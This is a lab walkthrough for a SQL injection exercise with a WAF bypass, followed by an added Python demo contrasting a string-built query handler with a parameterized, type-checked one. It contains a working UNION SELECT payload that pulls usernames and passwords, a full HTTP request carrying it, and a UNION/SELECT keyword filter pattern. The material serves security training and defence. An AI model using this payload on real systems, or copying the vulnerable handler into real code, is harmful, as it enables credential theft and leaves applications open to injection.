SQL injection with filter bypass via XML encoding
🔬 LAB:
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.
🐧 HINTS:
A web application firewall (WAF) will block requests that contain obvious signs of a SQL injection attack. You’ll need to find a way to obfuscate your malicious query to bypass this filter. We recommend using the Hackvertor extension to do this.
💡 SOLUTION:
With HTML Entity Encoder / Decoder we can encode our payload to bypass the WAF.
Payload:
UNION SELECT username || '~' || password FROM users
POST request:
POST /product/stock HTTP/2
Host: 0a0900320483449a909e56d6006e00ee.web-security-academy.net
Cookie: session=r0FXrBxFVQgwscKUTvq1p2nvvn70y827
Content-Length: 418
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/xml
Accept: */*
Origin: https://0a0900320483449a909e56d6006e00ee.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a0900320483449a909e56d6006e00ee.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1
</productId><storeId>1 UNION SELECT username || '~' || password FROM users</storeId>
</stockCheck>
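The reason the bypass works is that a WAF inspects the raw request bytes while the application inspects the value the XML parser produces, and those two differ once character references are involved. The following Python example is added here to illustrate that gap from the defender's side; it is not code from the lab or from this write-up's author. It assumes a stock-check handler with the page's `<stockCheck><productId>…</productId><storeId>…</storeId></stockCheck>` body, an in-memory SQLite database with constructed `stock` and `users` tables, and hypothetical handler names (`vulnerable_stock_check`, `hardened_stock_check`). The `REFERENCE_BODY` sample is constructed: it carries the benign value `1` written as a numeric character reference, which is enough to show that the parsed value is not what a raw-byte filter saw.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed request bodies (same shape as the lab's stock-check request).
PLAIN_PAYLOAD_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId>"
    "<storeId>1 UNION SELECT username || '~' || password FROM users</storeId>"
    "</stockCheck>"
)
# Benign storeId "1", written as the XML numeric character reference &#49;.
REFERENCE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<stockCheck><productId>1</productId><storeId>&#49;</storeId></stockCheck>"
)

SQL_KEYWORDS = re.compile(r"\b(UNION|SELECT)\b", re.IGNORECASE)


def raw_body_matches_filter(body: str) -> bool:
    """WAF-style keyword check on the undecoded request bytes."""
    return bool(SQL_KEYWORDS.search(body))


def parsed_field(body: str, name: str) -> str:
    """The value the application sees: stdlib ET resolves character references."""
    root = ET.fromstring(body)
    return (root.findtext(name) or "").strip()


def build_db() -> sqlite3.Connection:
    """Constructed schema standing in for the lab's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE stock(product_id INTEGER, store_id INTEGER, units INTEGER);
        INSERT INTO stock VALUES (1, 1, 42), (1, 2, 7);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
        """
    )
    return conn


def vulnerable_stock_check(conn: sqlite3.Connection, body: str) -> List:
    """String-built query: the parsed storeId becomes part of the SQL text."""
    product = parsed_field(body, "productId")
    store = parsed_field(body, "storeId")
    sql = (
        "SELECT units FROM stock "
        f"WHERE product_id = {product} AND store_id = {store}"
    )
    return [row[0] for row in conn.execute(sql).fetchall()]


def hardened_stock_check(conn: sqlite3.Connection, body: str) -> Optional[int]:
    """Type-coerce after parsing, then bind parameters; SQL text is constant."""
    try:
        product = int(parsed_field(body, "productId"))
        store = int(parsed_field(body, "storeId"))
    except ValueError:
        return None  # anything that is not an integer id is rejected
    row = conn.execute(
        "SELECT units FROM stock WHERE product_id = ? AND store_id = ?",
        (product, store),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("raw filter hits plain payload:", raw_body_matches_filter(PLAIN_PAYLOAD_BODY))
    print("raw filter sees reference body:", raw_body_matches_filter(REFERENCE_BODY))
    print("parsed storeId of reference body:", parsed_field(REFERENCE_BODY, "storeId"))
    print("vulnerable handler returns:", vulnerable_stock_check(db, PLAIN_PAYLOAD_BODY))
    print("hardened handler, plain payload:", hardened_stock_check(db, PLAIN_PAYLOAD_BODY))
    print("hardened handler, reference body:", hardened_stock_check(db, REFERENCE_BODY))
```

The takeaway for the defender is the contrast between the two handlers rather than the filter: any check that runs before XML parsing reasons about bytes the application never uses, so the durable fix is to parse first, coerce the field to the type the query expects, and bind it as a parameter so the SQL text never changes.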